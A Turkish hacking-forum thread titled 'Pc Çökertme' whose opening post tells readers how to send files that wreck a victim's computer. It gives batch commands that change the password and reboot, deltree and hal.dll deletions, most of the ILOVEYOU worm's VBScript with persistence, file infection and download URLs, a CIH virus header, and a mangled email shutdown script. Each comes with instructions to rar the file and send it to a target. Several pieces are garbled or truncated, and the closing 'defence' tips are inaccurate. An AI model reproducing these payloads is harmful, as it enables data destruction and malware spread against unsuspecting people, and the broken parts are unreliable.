İPUCU

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.

Seçenekler

Pc Çökertme

11-03-2014 21:54
#1
SuvarixL - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2013
Nereden:
New York
Mesajlar:
863
Teşekkür (Etti):
42
Teşekkür (Aldı):
92
Konular:
301
Ticaret:
(0) %
UZUN OLDUĞUNA BAKMAYIN HER BÖLÜM KISA VE KOLAY
.İYİ HACKLER.
__________________________________________________ _________


__________________________________________________ _________
karşı pc ye şifre koymak için aşağıda verdiğim kodları yazıp formatını .bat yapıosunuz ve rarlayıp adama gönderiosunuz.pc 30 sn içinde kapanıyor yeniden açıldığında şifre soruyor.123456 yazan yer şifre siz kafanıza göre değiştirebilirsiniz.
kodlar:
net user %username% 123456
shutdown -r
__________________________________________________ __________
Önüne gelen İce CoLd gibi Basit proglarla Msn leri dondurmaya Çalışıyor ...
BaşLat |Çalıştır | Altdakini Kopyala Yapıştır EnterLa tamamdır.
Kod:
RunDll32 advpack.dll,LaunchINFSection %windir%\\INF\\msmsgs.inf,BLC.Remove
__________________________________________________ __________
karşı pc yi çökertmek için:
kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off cls cls @echo .::Seni salak formatı yedin::. @echo off
1.notepad i açın
2.yukarıdaki kodları kopyalayıp yapıştırın.
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.Karşı tarafa rarlayıp yollayın açtığında pc çöksün.
__________________________________________________ __________
bu da dünyayı sallayan bir virüs.en bastan soyleyim kendi pcnizde denemyin
pcniz acilmaz.Açmak için format attiramassiniz.Çünkü CD-ROM çalismaz.CD-ROM u degistirseniz bile nafile.
kodlar:
rem delete -pcas(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="scri*t.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\scri*t.i ni")
scriptini.WriteLine "[scri*t]"
scriptini.WriteLine ";mIRC scri*t"
scriptini.WriteLine "; Please dont edit this scri*t... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
yukarıdaki kodları kopyala not defterine yapistir sonra farkli kaydet fronten anti-virüs.bat olarak kaydedin kaydettikten sonra uzantisini (formatini) .exe olarak degistirin.
__________________________________________________ ________
HOTMAİLE GİDİN YENİ MESAJ YARATA GİRİN.KİME BÖLÜMÜNE KURBANIN MAİL ADRESİNİ YAZIN.
KONUYA İLGİ ÇEKİCİ BİŞEY YAZIN.
MESAJ BÖLÜMÜNE DE MESAJINIZI YAZIN VE SONRA ALTTAKİ KODu EKLEYİN.ADAM MAİLİ AÇTIĞINDA PC HER AÇILDIĞINDA 24 SN DE BİR KAPANACAK.
Kod:
<locati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt language="vblocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt">
on error resume next
dim kutluk
set kutluk=CreateObject("Wlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1ptlocati0n refr€sh scr1pt.Shell")

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32"*"shutdown
__________________________________________________ ________
PC YE YAPILAN SALDIRIDAN KURTULMAK İÇİN:
1. yol başlat>çalıştır>cmd>net view yazıyoruz ve bilgisayarımıza bağlanan kişiyi programsız olarak görüyoruz.Bu kadar kolay
2.yol başlat>çalıştır>cmd>net share yazıyoruz ve bilgisayarımıza bağlanan kişiyi programsız olarak görüyoruz ancak bu yöntemde bir uzak yönetici çıkar bu microsoft'un pc mize yerleştirdiği trojandir zararsızdır.Eğer uzak yönetici sayısı 2 ye çıkarsa o zaman pc mize biri girmiş demektir. (2. yol daha garantilidir)
Ayrıca bu yolla bilgisayarınıza birinin girdiğini öğrenirseniz başlat>çalıştır>cmd>net computer "kurbanın ip numarası" ve mükemmel sonuç.
__________________________________________________ ________

KARŞIDAKİNİN ANAKARTINI YAKMAK İÇİN AŞAĞIDAKİ KODLARIN TAMAMINI KOPYALAYIP FORMATINI .BAT YAPIN.RARLAYIP GÖNDERİN.AÇSIN ANAKART YANSIN.
KOD:
************************************************** *************************
*
; * The Virus Program Information *
;
************************************************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT bydogan of Turkey *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 06/21/2007
*
; * *
;
*================================================= =========================
*
; * Modification History *
;
*================================================= =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*================================================= =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*================================================= =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
************************************************** *************************
*

.586P
;
************************************************** *************************
*
; * Original PE Executable File(Don't Modify this Section)
*
;
************************************************** *************************
*

OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
__________________________________________________ _______

KARŞI PC Yİ ÇÖKERTMEK İÇİN:
ilk olarak bi not defteri açin daha sonra not defrerinin içine sunlari yapistirin
del C:/WINDOWS/system32/hal.dll sonra farkli kaydete gelin .txt uzantisini .bat a çevirin.sonra rarlayıp gönderin.açsın pc si çöksün.
__________________________________________________ _______

KARŞI PC Yİ ÇÖKERTMEK İÇİN BAŞKA BİR YÖNTEM:
KOD:

01001011000111110010010101010101010000011111100000
yukarıdaki kodları kopyalayın not defterine yapıştırın kaydederken uzantısını .exe yapın rarlayın ve gönderin açsın pc si çöksün.
__________________________________________________ _______

Bi Teşekkürü Esirgemeyin . Teşekkürler
Kullanıcı İmzası
İnsanlar Hükümetlerinden Korkmamalı . Hükümetler İnsanlarından Korkmalı .

Kim Olduğun , Ne Yaptığının Yanında Önemsizdir.
FerrieMagno, VITALLION, ask ve gurur Teşekkür etti.

11-04-2014 21:34
#2
Üyelik tarihi:
08/2012
Mesajlar:
19
Teşekkür (Etti):
17
Teşekkür (Aldı):
2
Konular:
2
Ticaret:
(0) %
ahaha kardeş kuzenime bunu gösterdim adam inanmadı bilgisayarı çökertti
12-04-2014 11:27
#3
harundemka4 - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
10/2012
Nereden:
İstanbul
Mesajlar:
773
Teşekkür (Etti):
180
Teşekkür (Aldı):
97
Konular:
119
Ticaret:
(0) %
FerrieMagno : Tanıdığa Niye Yapıyosun Paşam

>> Eline Sağlık
12-04-2014 11:40
#4
cor-vo - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2013
Mesajlar:
8.047
Teşekkür (Etti):
4149
Teşekkür (Aldı):
2323
Konular:
2193
Ticaret:
(0) %
Alıntı:
harundemka4´isimli üyeden Alıntı Mesajı göster
FerrieMagno : Tanıdığa Niye Yapıyosun Paşam

>> Eline Sağlık
tanıdığına yapmamış, kuzenine göstermiş bu yöntemi, kuzeni inanmamış ve açmış

Mükemmel bir konu olmuş da şu "NET SHARE" ile ilgili bir sorum var. bende sadece 1 Uzak yönetici var, birde NET COMPUTER "kubanın ip adresi" diyorsunda bunla da bize trojan atan adamın bilgisayarına mı giriyoz onu bana açıklarmısın?
Kullanıcı İmzası
cor-vo | corvo9394
12-04-2014 15:17
#5
Üyelik tarihi:
08/2012
Mesajlar:
19
Teşekkür (Etti):
17
Teşekkür (Aldı):
2
Konular:
2
Ticaret:
(0) %
Alıntı:
harundemka4´isimli üyeden Alıntı Mesajı göster
FerrieMagno : Tanıdığa Niye Yapıyosun Paşam

>> Eline Sağlık
Yok be abi kuzenime gösterdim inanmadı deneyincede gitti bilgisayar

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı